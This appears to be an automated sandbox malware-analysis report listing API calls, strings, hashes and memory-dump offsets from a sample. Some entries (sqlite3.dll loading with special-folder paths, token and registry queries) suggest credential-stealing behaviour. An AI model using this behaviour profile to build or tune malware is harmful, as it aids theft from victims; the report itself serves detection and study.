                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$AllocateHeap
                                                          • String ID: T!G$p!G
                                                          • API String ID: 3033488037-1934873081
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: -4(F$Inuh$RTV$`G\A$c~mk$i
                                                          • API String ID: 3519838083-4182963312
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: -4(F$Inuh$RTV$`G\A$c~mk$i
                                                          • API String ID: 3519838083-4182963312
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(?), ref: 002A3B92
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 002A3BCD
                                                          • FreeLibrary.KERNEL32(00000000), ref: 002A3C01
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Library$AddressFreeLoadProc
                                                          • String ID: !$0%*'$8%24$y3;;
                                                          • API String ID: 145871493-1146062926
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000008,?), ref: 002A7D8E
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 002A7D95
                                                          • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 002A7DAF
                                                          • GetLastError.KERNEL32 ref: 002A7DB9
                                                          • GlobalAlloc.KERNEL32(00000040,00000000), ref: 002A7DC9
                                                          • GetTokenInformation.ADVAPI32(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 002A7DDD
                                                          • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 002A7DF1
                                                          • GlobalFree.KERNEL32(00000000), ref: 002A7E11
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Token$GlobalInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
                                                          • String ID:
                                                          • API String ID: 857934279-0
                                                          • Opcode ID: f7ae03d04bcf4bcea9be981246b4f95a5eb60c21456bc1f444ef70093901814f
                                                          • Instruction ID: fd57fc40955dbf426825a651956723d1ec2885348ac1171bfc3f9caaac77803c
                                                          • Opcode Fuzzy Hash: f7ae03d04bcf4bcea9be981246b4f95a5eb60c21456bc1f444ef70093901814f
                                                          • Instruction Fuzzy Hash: 49115B35A14105FBDB209FE1DD49FAF7F78EB05751F1004A5E505E1090EB708A24DB69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0027CDB6
                                                            • Part of subcall function 002A4CBB: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104,00000000), ref: 002A4D07
                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                          • LoadLibraryA.KERNEL32(00000000), ref: 0027CDF3
                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0027CE2B
                                                          • lstrcatW.KERNEL32(?,?), ref: 0027CE6E
                                                            • Part of subcall function 002794E0: __EH_prolog.LIBCMT ref: 002794E5
                                                            • Part of subcall function 002794E0: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 002795FD
                                                            • Part of subcall function 002794E0: HeapFree.KERNEL32(00000000,?,?), ref: 00279604
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                          • FreeLibrary.KERNEL32(00000000), ref: 0027D429
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$FreeHeapLibrary$DeallocateEnvironmentFolderLoadPathProcessSpecialVariablelstrcat
                                                          • String ID: sqlite3.dll
                                                          • API String ID: 3496207294-1155512374
                                                          • Opcode ID: a6c0706986e1bac372897b82dea1413220cc9197a2d7a0e627b13901d1d5e4db
                                                          • Instruction ID: 5cdf71c565b23abf576339a2b0e4270cb5a6ff23a6104c21423d549dce14d054
                                                          • Opcode Fuzzy Hash: a6c0706986e1bac372897b82dea1413220cc9197a2d7a0e627b13901d1d5e4db
                                                          • Instruction Fuzzy Hash: EA12D031D252199FDF14EFA4C859BEEBBB4BF11314F108068E4097B282DB749A55CFA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 002A366E
                                                          • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 002A36CC
                                                            • Part of subcall function 002A7BF1: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 002A7C16
                                                            • Part of subcall function 002A7BF1: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 002A7C4B
                                                          • WriteFile.KERNEL32(?,00000000,?,50504C24,00000000), ref: 002A395A
                                                          • GetLastError.KERNEL32 ref: 002A3974
                                                          • CloseHandle.KERNEL32(00000000), ref: 002A398F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWide$CloseCreateErrorH_prologHandleLastWrite
                                                          • String ID: $LPPTW
                                                          • API String ID: 1278328058-1016409822
                                                          • Opcode ID: 1ff23779b1778eb6ad83130346efe126938da529bb5ffe9d1080cf49a85a3d14
                                                          • Instruction ID: ae1ea6eb702b99d5c22929eac8aef1de7d975755b9218cdb9fffb9859d629de1
                                                          • Opcode Fuzzy Hash: 1ff23779b1778eb6ad83130346efe126938da529bb5ffe9d1080cf49a85a3d14
                                                          • Instruction Fuzzy Hash: 92A19EB1910209AFDB14DBA4CC85AFFBBB8EF09300F00446AF449E7241EBB49A54CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 00442C57
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00442C5F
                                                          • _ValidateLocalCookies.LIBCMT ref: 00442CE8
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00442D13
                                                          • _ValidateLocalCookies.LIBCMT ref: 00442D68
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: c0f73d81d05a09f537ca0863073cc27e0ee0714cec2df10a2702fcd2f5437cf1
                                                          • Instruction ID: 6dc917fe1f51190c90abd66d76278e3b5df7c3dc57b4ff05460de9a25fec1892
                                                          • Opcode Fuzzy Hash: c0f73d81d05a09f537ca0863073cc27e0ee0714cec2df10a2702fcd2f5437cf1
                                                          • Instruction Fuzzy Hash: 2441E634E002089BDF10DF69C880A9EBBB5BF45328F54805BFC159B392D779EA05CB99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002A3FD2
                                                          • lstrlenW.KERNEL32(?), ref: 002A3FF8
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 002A4015
                                                          • lstrcatW.KERNEL32(00000000,0047DE0C), ref: 002A4021
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 002A402F
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 002A4063
                                                          • RegCloseKey.ADVAPI32(?), ref: 002A4070
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: lstrcat$CloseEnumOpenlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 2943937744-0
                                                          • Opcode ID: 78cb65f283d8e8838015dcd29c323fc9745513db7ebfca78a49ab22cb2503cf2
                                                          • Instruction ID: 8e1dbb0a583fd432fcb908497bb866286f338314c95137006ca336edee1d37b1
                                                          • Opcode Fuzzy Hash: 78cb65f283d8e8838015dcd29c323fc9745513db7ebfca78a49ab22cb2503cf2
                                                          • Instruction Fuzzy Hash: 1A2149B5401128BFEB11AB90DD88DEF7B7CEF06394F004062F949E2111EAB09A509EA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: G:\rc-build-v1-exe\json.hpp$cannot get value$m_it.array_iterator != m_object->m_value.array->end()$m_it.object_iterator != m_object->m_value.object->end()$m_object != nullptr
                                                          • API String ID: 3519838083-3730491859
                                                          • Opcode ID: f49792c5e4f1e6477262a3c47b6aa0ff3ecb67c1087255184dd75c898a0221b3
                                                          • Instruction ID: 99b5c3ad146527391edd5f3ad905f6487279d4199debdbd518e0852b82684b8a
                                                          • Opcode Fuzzy Hash: f49792c5e4f1e6477262a3c47b6aa0ff3ecb67c1087255184dd75c898a0221b3
                                                          • Instruction Fuzzy Hash: 8B21F3307002109FD714EB5AD986EAAB7F4EF81708F54801FE48667792D779ED11CA19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 002D1091: _free.LIBCMT ref: 002D10B6
                                                          • _free.LIBCMT ref: 002D1393
                                                            • Part of subcall function 002C7C93: HeapFree.KERNEL32(00000000,00000000), ref: 002C7CA9
                                                            • Part of subcall function 002C7C93: GetLastError.KERNEL32(?,?,002D10BB,?,00000000,?,00000002,?,002D135E,?,00000007,?,?,002D175F,?,?), ref: 002C7CBB
                                                          • _free.LIBCMT ref: 002D139E
                                                          • _free.LIBCMT ref: 002D13A9
                                                          • _free.LIBCMT ref: 002D13FD
                                                          • _free.LIBCMT ref: 002D1408
                                                          • _free.LIBCMT ref: 002D1413
                                                          • _free.LIBCMT ref: 002D141E
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 7fc3fbf7540436e89252574c01c4b56ab8606f2a28b743f18f6349b8b9664cb0
                                                          • Instruction ID: c9b739f4f04c64aae96515cafb4d526f7c8bad3367fc58abc8741537e35ac9bc
                                                          • Opcode Fuzzy Hash: 7fc3fbf7540436e89252574c01c4b56ab8606f2a28b743f18f6349b8b9664cb0
                                                          • Instruction Fuzzy Hash: DA1190B1610F44BAD520BBB0CC17FDB779D9F08311F48082AB69D66552D734AAB08E41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F4,G:\rc-build-v1-exe\json.hpp,?), ref: 002BECA0
                                                          • GetFileType.KERNEL32(00000000), ref: 002BECB2
                                                          • swprintf.LIBCMT ref: 002BECD3
                                                          • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000), ref: 002BED10
                                                          Strings
                                                          • G:\rc-build-v1-exe\json.hpp, xrefs: 002BEC9A
                                                          • Assertion failed: %Ts, file %Ts, line %d, xrefs: 002BECC8
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ConsoleFileHandleTypeWriteswprintf
                                                          • String ID: Assertion failed: %Ts, file %Ts, line %d$G:\rc-build-v1-exe\json.hpp
                                                          • API String ID: 2943507729-2446739629
                                                          • Opcode ID: 3e5cc508526abb63b65f47f70695c46779976d38fd58a10f11fce28493eb44a6
                                                          • Instruction ID: 555e40483071c088393bf70fb6f5b62f38f6795b13d0c3e792c54d9a5bc98ff1
                                                          • Opcode Fuzzy Hash: 3e5cc508526abb63b65f47f70695c46779976d38fd58a10f11fce28493eb44a6
                                                          • Instruction Fuzzy Hash: 0111577150011AABCF20AF29CC85EEE77BCEF45310F514659FE16A3081EA30AD558B68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F4,G:\rc-build-v1-exe\json.hpp,?), ref: 0044EA50
                                                          • GetFileType.KERNEL32 ref: 0044EA62
                                                          • swprintf.LIBCMT ref: 0044EA83
                                                          • WriteConsoleW.KERNEL32 ref: 0044EAC0
                                                          Strings
                                                          • G:\rc-build-v1-exe\json.hpp, xrefs: 0044EA4A
                                                          • Assertion failed: %Ts, file %Ts, line %d, xrefs: 0044EA78
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ConsoleFileHandleTypeWriteswprintf
                                                          • String ID: Assertion failed: %Ts, file %Ts, line %d$G:\rc-build-v1-exe\json.hpp
                                                          • API String ID: 2943507729-2446739629
                                                          • Opcode ID: 3e5cc508526abb63b65f47f70695c46779976d38fd58a10f11fce28493eb44a6
                                                          • Instruction ID: 0bf84f6389b237df00b867331b3627312fdcf954ca5060b5c05d84965fdf9818
                                                          • Opcode Fuzzy Hash: 3e5cc508526abb63b65f47f70695c46779976d38fd58a10f11fce28493eb44a6
                                                          • Instruction Fuzzy Hash: A8113871500119ABDB20DB2ACC849EF77ACFF85314F50455AFE16A3181EA349D458B68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetConsoleCP.KERNEL32 ref: 002C728E
                                                          • __fassign.LIBCMT ref: 002C746D
                                                          • __fassign.LIBCMT ref: 002C748A
                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002C74D2
                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 002C7512
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 002C75BE
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                                          • String ID:
                                                          • API String ID: 4031098158-0
                                                          • Opcode ID: e7873b79e4302506c51b47c3d30267c2c2735e178dc8807b98845d0cb54826ed
                                                          • Instruction ID: 92b3ef3cb99cc2a064a8d3ba768e143d17313ee2b2116267388da5dcdda82e39
                                                          • Opcode Fuzzy Hash: e7873b79e4302506c51b47c3d30267c2c2735e178dc8807b98845d0cb54826ed
                                                          • Instruction Fuzzy Hash: B9D18B71D142999FCB15CFA8D880EEDBBB5BF48314F28026EE855BB242D730A956CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 002C40D8
                                                          • _free.LIBCMT ref: 002C40F3
                                                          • _free.LIBCMT ref: 002C40FE
                                                          • _free.LIBCMT ref: 002C420B
                                                            • Part of subcall function 002C81BD: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 002C81FE
                                                          • _free.LIBCMT ref: 002C41E0
                                                            • Part of subcall function 002C7C93: HeapFree.KERNEL32(00000000,00000000), ref: 002C7CA9
                                                            • Part of subcall function 002C7C93: GetLastError.KERNEL32(?,?,002D10BB,?,00000000,?,00000002,?,002D135E,?,00000007,?,?,002D175F,?,?), ref: 002C7CBB
                                                          • _free.LIBCMT ref: 002C4201
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$Heap$AllocateErrorFreeLast
                                                          • String ID:
                                                          • API String ID: 4150789928-0
                                                          • Opcode ID: 65171aa452c86e67efc77ce06e6bea77c102cab12ba481b5bf8be829f8d00895
                                                          • Instruction ID: 48b974e90c3d8660849a51cc9c89252ba8cf922bb2014cb751505845dfcba20f
                                                          • Opcode Fuzzy Hash: 65171aa452c86e67efc77ce06e6bea77c102cab12ba481b5bf8be829f8d00895
                                                          • Instruction Fuzzy Hash: 3E51CF36A142025BDF14BF688862FFB77A5CF84310F18035EFD45DB241EA329E12CA50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 002A328A
                                                            • Part of subcall function 002A7BF1: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 002A7C16
                                                            • Part of subcall function 002A7BF1: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 002A7C4B
                                                          • _strlen.LIBCMT ref: 002A3517
                                                          • _strlen.LIBCMT ref: 002A3521
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ByteCharMultiWide_strlen$H_prolog
                                                          • String ID: W?##'$
                                                          • API String ID: 3152227400-3983677542
                                                          • Opcode ID: e99adf2ad196b2b754edb63601f1fde709a54a6ffd569c2ae6aa2dc30fa815e9
                                                          • Instruction ID: 7dcaaa44dd6414503611906f64e2d303ba72aa5b5a001f032a55f4f0c10c453f
                                                          • Opcode Fuzzy Hash: e99adf2ad196b2b754edb63601f1fde709a54a6ffd569c2ae6aa2dc30fa815e9
                                                          • Instruction Fuzzy Hash: 64C19F71911218AFDB15DFA4CC85AFEB7B8EF09300F1081ADE819A7241EB749B54CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,002B3061,002B1AD6,002B0259), ref: 002B3078
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002B3086
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002B309F
                                                          • SetLastError.KERNEL32(00000000,002B3061,002B1AD6,002B0259), ref: 002B30F1
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: f4666fc2ad97d270be6435d9c2a2bd9f0daf06447ec2970fb2af1f9786d4251a
                                                          • Instruction ID: a21e91b7ffef4eea935a3edb6c2fb09216038a39507451f570fd6a7b1581e78b
                                                          • Opcode Fuzzy Hash: f4666fc2ad97d270be6435d9c2a2bd9f0daf06447ec2970fb2af1f9786d4251a
                                                          • Instruction Fuzzy Hash: 1801D83223E2126EA6247AB87CC57EA2BA8DF027F4371463EF510950E1EE624C355758
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0028019B
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 002801A9
                                                          • int.LIBCPMT ref: 002801C0
                                                            • Part of subcall function 00277A47: std::_Lockit::_Lockit.LIBCPMT ref: 00277A58
                                                            • Part of subcall function 00277A47: std::_Lockit::~_Lockit.LIBCPMT ref: 00277A72
                                                          • std::_Facet_Register.LIBCPMT ref: 002801FA
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00280210
                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00280225
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
                                                          • String ID:
                                                          • API String ID: 2251497708-0
                                                          • Opcode ID: 48e2f888b202f36c544d88fc9848485b284310dff139f14bbf91c122f2094152
                                                          • Instruction ID: bd33a847f87a5fe311afafbc3a447cf3e025d6aeb87bd494a17364ef85dba4e4
                                                          • Opcode Fuzzy Hash: 48e2f888b202f36c544d88fc9848485b284310dff139f14bbf91c122f2094152
                                                          • Instruction Fuzzy Hash: 9F1108359311159BCB04EFA8D849AAE7B74FF45320F104619F815672C1DF749D15CBE4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 002A95F2
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 002A9600
                                                          • int.LIBCPMT ref: 002A9617
                                                            • Part of subcall function 00277A47: std::_Lockit::_Lockit.LIBCPMT ref: 00277A58
                                                            • Part of subcall function 00277A47: std::_Lockit::~_Lockit.LIBCPMT ref: 00277A72
                                                          • std::_Facet_Register.LIBCPMT ref: 002A9651
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 002A9667
                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 002A967C
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
                                                          • String ID:
                                                          • API String ID: 2251497708-0
                                                          • Opcode ID: 15e3bd91685e26ec751e42e74c8ab8b333426b1ee6bc5da0d5be2e13b44e5633
                                                          • Instruction ID: 35afb41b46315b20f2e2b53f959b9a3e21ae11662b2d429fc1d73276daff1aab
                                                          • Opcode Fuzzy Hash: 15e3bd91685e26ec751e42e74c8ab8b333426b1ee6bc5da0d5be2e13b44e5633
                                                          • Instruction Fuzzy Hash: 3D1104729201159BCB04EF68C845ABE7B78EF46720F104519F515A72C1EF749E50CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0027FA6C
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0027FA7A
                                                          • int.LIBCPMT ref: 0027FA91
                                                            • Part of subcall function 00277A47: std::_Lockit::_Lockit.LIBCPMT ref: 00277A58
                                                            • Part of subcall function 00277A47: std::_Lockit::~_Lockit.LIBCPMT ref: 00277A72
                                                          • std::_Facet_Register.LIBCPMT ref: 0027FACB
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0027FAE1
                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 0027FAF6
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free_strpbrk
                                                          • String ID: *?
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: AdjustPointer
                                                          • String ID: @
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D.G
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 002A7A6E
                                                          • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?,?,00000000,00000000), ref: 002A7AEF
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000040), ref: 002A7B3E
                                                          • RegCloseKey.ADVAPI32(?), ref: 002A7B5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: CloseH_prologOpenQueryValue
                                                          • String ID: @
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: eA$G:\rc-build-v1-exe\json.hpp$is_contiguous$'B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CoCreateInstance.OLE32(0046C8B0,00000000,00000015,0046C8D0,?), ref: 00293913
                                                          • StrStrIW.SHLWAPI(?,0047D4D4), ref: 00293964
                                                          • CoTaskMemFree.OLE32(?), ref: 00293982
                                                          • CoTaskMemFree.OLE32(?), ref: 00293990
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: FreeTask$CreateInstance
                                                          • String ID: (
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog2.LIBCMT ref: 00278736
                                                            • Part of subcall function 0027842C: __EH_prolog.LIBCMT ref: 00278431
                                                            • Part of subcall function 002B2DA3: RaiseException.KERNEL32(E06D7363,00000001,00000003,00000000,00488A38,?,002AE60B,00000000,004851C0,?), ref: 002B2E03
                                                          • __EH_prolog.LIBCMT ref: 0027878D
                                                          • std::system_error::system_error.LIBCPMT ref: 0027879F
                                                            • Part of subcall function 002776FB: std::exception::exception.LIBCMT ref: 00277706
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$ExceptionH_prolog2Raisestd::exception::exceptionstd::system_error::system_error
                                                          • String ID: ryF$yF
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0028D5BF
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0028D5CF
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0028D5DF
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0028D602
                                                          Strings
                                                          • G:\rc-build-v1-exe\json.hpp, xrefs: 0028D5A3
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: std::bad_exception::bad_exception
                                                          • String ID: G:\rc-build-v1-exe\json.hpp
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0028D697
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0028D6A7
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0028D6B7
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0028D6DA
                                                          Strings
                                                          • G:\rc-build-v1-exe\json.hpp, xrefs: 0028D67B
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: std::bad_exception::bad_exception
                                                          • String ID: G:\rc-build-v1-exe\json.hpp
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00446674,?,?,0044663C,00000000,00000000,?), ref: 00446694
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,00446674,?,?,0044663C,00000000,00000000,?), ref: 004466A7
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00446674,?,?,0044663C,00000000,00000000,?), ref: 004466CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$InformationTimeZone
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 002794E5
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 002795FD
